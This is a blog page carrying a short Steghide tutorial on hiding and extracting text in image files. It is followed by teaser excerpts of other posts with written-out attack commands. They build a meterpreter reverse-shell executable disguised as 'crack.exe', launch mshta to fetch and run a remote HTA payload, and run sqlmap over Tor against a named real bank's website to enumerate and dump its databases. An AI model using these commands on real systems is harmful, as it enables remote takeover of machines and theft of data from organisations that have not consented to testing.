Skip to main content

Steganography using STEGHIDE

Guide to Steghide Tool


In this article, we’ll learn about Steghide. There are various steganography tools available but the part that differentiates it is that it uses a variety of algorithms to encrypt the data. Moreover, Steghide supports to hide data behind any image(jpg/jpeg/png/gif/bmp), audio (mp3/wav), excel, etc.

Introduction to Steganography

In digital steganography, electronic communications may incorporate steganographic coding inside of a transport layer, such as a document file, picture file, program or convention. Sender can begin with a harmless picture and make few alterations to it in order to hide data, so that, this alteration goes unnoticed for someone who is not particularly seeking out for it.


Features

Compression of embedded data

BMP, GIF and JPG supported

Encryption of embedded data

Decryption via password

Uses various algorithms for encryption


STEP 1: Open your terminal and type the following command to download Steghide 

apt-get install steghide


For help :

steghide --help


STEP 2: Embedding Data in The Image

Here I have two files, a .txt file and a .jpeg file. Our aim is to hide the text file behind the jpeg image.

steghide embed -ef <txt filename> -cf <media filename>


After this you may delete the text file as it is already hidden now behind the image. Now in the next step we will extract back the text file from image file.

STEP 3: Extraction of Data Via Steghide

Open terminal and write the following command

steghide extract -sf <media filename>

Provide the password that u provided before to extract

To get the details of Image enter the following command:

steghide info <media filename>


Compression Mode

Now if we want to compress text file before hiding it then we would use the following command. The compression level can vary from 1 to 9. The first level gives you speed to compress whereas, at 9th level, it will provide you with the best compression techniques.

steghide embed  -ef <txt filename> -cf <media filename> -z 2

Encrypting Algorithms

We can encrypt the data that we are hiding by using encryption techniques. And this can be easily achieved by just using the following command :

steghide embed -ef <txt filename> -cf <media filename> -e <algorithm name>


For Windows please click the link below to download :



Reviews and Comments will be appreciated. Thanks ☺

Labels:

Comments

Post a Comment

Popular posts from this blog

Exploiting Windows 10

Exploiting Windows 10 (latest update) using metasploit (in KALI): Cyberator Introduction: The Metasploit Framework is the most commonly-used framework for hackers worldwide. It allows hackers to set up listeners that create a conducive environment (referred to as a Meterpreter) to manipulate compromised machines. In this article, we’ll look at how this framework within Kali Linux can be used to attack a Windows 10 machine.  This article assumes the installation of Kali Linux has been done and is reachable through a bridged connection from a Windows machine on Virtual-box. Step 1: - Open terminal in Kali and type the following command: msfvenom -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=<your IP> -f exe > /root/Desktop/crack.exe Step 2: - Open terminal in Kali and type the following commands     msfdb init    msfconsole    use exploit/multi/handler    set payload windows/x64/meterpreter/reverse_tcp    set lport 8080    set lhost <your IP address>    exploit S
Post a Comment
Read more

SQLMAP - Using TOR proxy

Using SQLMAP with TOR OS: Windows 10 Compiler : Python 3.x Script : SQLMAP Proxy: TOR STEP 1: Download and install TOR  https://www.torproject.org/download/ STEP 2: Install TOR and Start TOR services After installing Tor, a new folder of Tor will be created (Desktop in my case) Navigate to the following location and start tor.exe Desktop\Tor Browser\Browser\TorBrowser\Tor STEP 3: Follow my previous post on SQLMAP to find a target Navigate to the SQLMAP folder in power shell. Execute the following commands- python .\sqlmap.py --tor --tor-type=SOCKS5 -u "https://www.fcibank.com.pk/index.php?route=common/page&pageid=%7B021A9F2C-951C-B9F7-D1B6-805BA07752DB%7D" --dbs STEP 4: Follow the same steps as in my previous post on SQLMAP to find Database names, Table names and dump the Tables. Just add the following option in it: .\sqlmap.py --tor --tor-type=SOCKS5 SQLMAP OPTIONS # Enumerate databases sqlmap --dbms=mysql -u " $URL " --dbs # Enumerate tables sqlmap --dbms=
3 comments
Read more

Metasploit HTA exploit

Today, I will give you a demo of the new Windows Hta_Server RCE exploit that allows hackers / penetration testers to have remote access to a windows computer. The exploit was publicly disclosed in late 2016 but was not noticed to the public eye till late 2018. It can be found and used easily by using Metasploit on a Kali-Linux distribution. STEP 1: Check your IP configuration (in this practical I have kept it on Bridge) STEP 2: Fire-up msfconsole in the kali terminal and search for hta_server Commands : service apache2 start msfconsole search HTA use exploit/windows/misc/hta_server STEP 3: Set all the values in the Metasploit variables. Commands: set SRVHOST <Your IP> exploit STEP 4: Open powershell in windows and execute the following command (in your case different URL will be generated):  .\mshta.exe http://192.168.43.15:8080/Zhh7aIVVD.hta As the command gets executed it will open up a session in msfconsole. You can view the session using the following command: sessions -l and
Post a Comment
Read more